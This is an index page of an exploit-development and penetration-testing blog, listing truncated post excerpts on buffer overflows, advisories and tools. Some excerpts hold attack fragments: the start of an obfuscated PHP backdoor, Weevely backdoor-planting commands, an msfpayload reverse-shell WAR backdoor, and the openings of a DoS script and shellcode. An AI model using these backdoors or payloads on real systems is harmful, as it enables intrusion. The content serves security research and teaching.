Spentera Blog (Page 2)

Sign in Subscribe

Aviosoft DTV Player 1.x Stack Buffer Overflow

Security Advisory

Aviosoft DTV Player 1.x Stack Buffer Overflow

Aviosoft DTV Player is a multiple format video player application. Aviosoft DTV Player 1.0.1.2 and possibly earlier versions fail to properly handle malformed user-supplied data within a playlist (.plf) file before copying it into an insufficiently sized buffer, resulting in a buffer overflow. Software Description Aviosoft DTV

BlazeVideo HDTV Player 6.x Buffer Overflow (another version)

Exploit Development

BlazeVideo HDTV Player 6.x Buffer Overflow (another version)

Hi again, we tried to make a universal DEP and ASLR bypass version on BlazeVideo HDTV Player 6.x. This exploit is already public, but we just want to make it universal. Take a look at mona.py [https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/] ? awesome tool

ScriptFTP <=3.3 Remote Buffer Overflow Exploit (MSF)

Exploit Development

ScriptFTP <=3.3 Remote Buffer Overflow Exploit (MSF)

You might be read about the previous post ScriptFTP Remote BOF [http://www.spentera.com/2011/09/scriptftp-3-3-remote-buffer-overflow-exploit-0day/] , if you are a Metasploit user, you can add this exploit module [http://www.exploit-db.com/exploits/17904/] to your Metasploit Framework. Update: Metasploit has released module for ScriptFTP. You can use

Porting Your Exploit to Metasploit

Exploit Development

Porting Your Exploit to Metasploit

[http://www.metasploit.com]Beberapa waktu yang lalu saya udah memberikan tutorial basic exploit development (direct return technique) [http://www.scribd.com/doc/50645626/Exploit-Development-Basic-Stack-based-Overflow] dan exploit development berbasis SEH [http://www.spentera.com/2011/09/seh-based-stack-overflow-the-basic/]. Sekarang mari kita porting exploit tersebut ke Metasploit Framework agar exploit tersebut semakin

Non-alphanumeric PHP Simple Backdoor

Non-alphanumeric PHP Simple Backdoor

After read and learn about non-alphanumeric code in php [http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/], i decide to write my own non-alphanumeric PHP simple backdoor. <? $_="{"; #XOR char $_=($_^"<").($_^">;").($_^"/"); #XOR = GET ?> <?=${'_'.$_}["_"](${'

ScriptFTP <=3.3 Remote Buffer Overflow Exploit (0day)

Security Advisory

ScriptFTP <=3.3 Remote Buffer Overflow Exploit (0day)

ScriptFTP [http://www.scriptftp.com] client is vulnerable against remote buffer overflow vulnerability. The condition is triggered while processing LIST FTP command with excessive length. The vulnerability is confirmed in version 3.3. Other version may also be affected. Software Description ScriptFTP is a FTP client designed to automate file

SEH Based Stack Overflow - The Basic

Exploit Development

SEH Based Stack Overflow - The Basic

Kali ini saya akan coba tehnik lain dari stack overflow, yaitu stack overflow berbasis SEH. Apa itu SEH? silakan dibaca diliteratur-literatur berikut: Structured Exception Handling [http://msdn.microsoft.com/en-us/library/ms680657(v=vs.85).aspx] Win32 Exception handling for assembler programmers [http://win32assembly.online.fr/Exceptionhandling.html] Tidak ada

MSF Postgres Problem on BT5

MSF Postgres Problem on BT5

If you read this post then I bet you have the same problem with me. When I tried to run the msfconsole on my BT5 I have this buggy information. [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host

Silent Backdoor with Weevely

Silent Backdoor with Weevely

Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5): root@bt:~# >cd /pentest/backdoors/web/weevely root@bt:/pentest/backdoors/web/weevely#./main.py

Mel0nPlayer 1.0.11.x Denial of Service POC

Exploit Development

Mel0nPlayer 1.0.11.x Denial of Service POC

Software Description Mel0n Player is a famous software in Indonesia to play songs that are provided by the Melon portal (http://www.melon.co.id). This software can play any music file types such as mp3, wav, wma, mp4, and others. This player can also play the files on your

Metasploit Meterpreter Command Shell Upgrade

Metasploit Meterpreter Command Shell Upgrade

Seeing is believing ? root@bt:~# msfconsole =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 707 exploits - 359 auxiliary - 57 post + -- --=[ 225 payloads - 27 encoders - 8 nops =[ svn r13065 updated today (2011.06.29) msf > use exploit/windows/smb/ms08_

Some Documents of File Specifications/Formats

Exploit Development

Some Documents of File Specifications/Formats

Here are some documents to help you understand some file formats/headers, for file format fuzzing purpose: WAVE PCM soundfile format (RIFF) https://ccrma.stanford.edu/courses/422/projects/WaveFormat/ ZIP File format specification http://www.pkware.com/documents/casestudies/APPNOTE.TXT MPEG File format http://www.mpgedit.org/mpgedit/

Backtrack 5: How to install VMware Workstation 7.1.3

Backtrack 5: How to install VMware Workstation 7.1.3

So I want to install VMware Workstation 7.1.3 on Backtrack 5, but there were errors after I ran the binary (e.g: ./VMware-Workstation-Full-7.1.3-324285.x86_64.bundle), so here’s the solution: Prepare the Kernel Look here: http://www.backtrack-linux.org/forums/backtrack-5-how-tos/40276-backtrack-5-how-prepare-kernel-sources-vmare-tools-drivers-etc.html Download patch

Dump Windows System Info

Dump Windows System Info

When you were asked to collect all Windows system information such as list of users, services, software installed and its version, Windows update history etc, you probably want to see these tools: System Information Collector WinUpdatesList v1.31 [http://www.nirsoft.net/utils/wul.html] WinAudit Freeware v2.28.2

Create a WAR backdoor with Metasploit

Create a WAR backdoor with Metasploit

Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps: 1. Creating the backdoor. dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W &gt; dudul.war Created

Remove Comments from Configuration

Remove Comments from Configuration

If you want to configure something, sometimes it contains the comments from the developer which help us to figure out options of arguments that will be used. But if you are already familiar with the configuration, comments can be annoying, and here we provide a way to remove them (using

QuickShare File Server 1.2.1 FTP Directory Traversal Vulnerability

Security Advisory

QuickShare File Server 1.2.1 FTP Directory Traversal Vulnerability

QuickShare File Server is prone to a FTP directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to modify files outside the destination directory and possibly gain access to the system. Software Description QuickShare File Server is a easy to use file

FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit

Exploit Development

FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit

A vulnerability has been discovered in FTPGetter, which can be exploited by malicious people to compromise a user’s system. The issue is likely due to insufficient bounds checking and presents itself when the affected FTP client makes a connection to a malicious server that is running PASV mode. The

ShodanHQ Queries For Penetration Tester

ShodanHQ Queries For Penetration Tester

Have you ever heard SHODAN Search Engine? > SHODAN [http://www.shodanhq.com] is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners. SHODAN also

ShodanHQ Exploits Search Engine

ShodanHQ Exploits Search Engine

For those who want to search a vulnerable version of applications during vulnerability assessment or penetration testing, take a look at ShodanHQ new feature, a ShodanHQ Exploits Search Engine. [http://www.shodanhq.com/exploits] It support CVE, OSVDB, Security Focus BID, Microsoft Security Bulletin(MSB), and Exploit-DB. Just input the

inSSIDer 2 now in linux

inSSIDer 2 now in linux

inSSIDer is the first award-winning wi-fi scanner to come out of the woodwork since the netstumbler era. Use inSSIDer to war drive or troubleshoot Wi-Fi channel placement. This program will display all Wi-Fi access points within range and display their MAC address, SSID, RSSI, Channel, Vendor, Encryption, Max Rate and

HttpBlitz Web Server Denial Of Service Exploit

Exploit Development

HttpBlitz Web Server Denial Of Service Exploit

HttpBlitz Server is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the application to crash, denying service to legitimate users. #!/usr/bin/python # Title: HttpBlitz DOS # Date: 12/24/2010 # Author: otoy # Software Link: http://sourceforge.net/projects/httpblitz/files/HttpBlitz.msi/download # Tested on:

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability

Security Advisory

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability

SolarFTP Server 2.0 is prone to a denial of service condition. It fails to properly sanitize user-supplied input resulting in a denial of service. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’, and ‘NLST’ command, a remote attacker can potentially disable the FTP service. Software Description Solar FTP Server

Exploit Development

27 Bytes - Windows XP SP3 (en) calc win32 Shellcode

/* ========================================================================== ___ _ __ __ __ _ __ ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _ / __ / / __ `/ / __/ __ `/ /_____/ _ / ___/ __ / / __ / __ / __ `/ / /_/ / / /_/ / / /_/ /_/ / /_____/ __/ /__/ / / / / /_/ / / / / /_/ / __,_/_/__, /_/__/__,_/_/ ___/___/_/ /_/_/__,_/_/ /_/__,_/ /____/ http://www.digital-echidna.org ========================================================================== Title : Window

Exploit Development

53 bytes - Windows XP SP3 (en) notepad.exe win32 Shellcode

Finally, my first win32 shellcode.. This will execute notepad.exe when loaded. Run on Windows XP SP3 English. /* (o_Ov) say hello to all digital-echidna org crew: otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix special thx to offsec, exploit-db, and corelan team */ /*shellcodetest.c*/ char code[] = "\x31\xc0\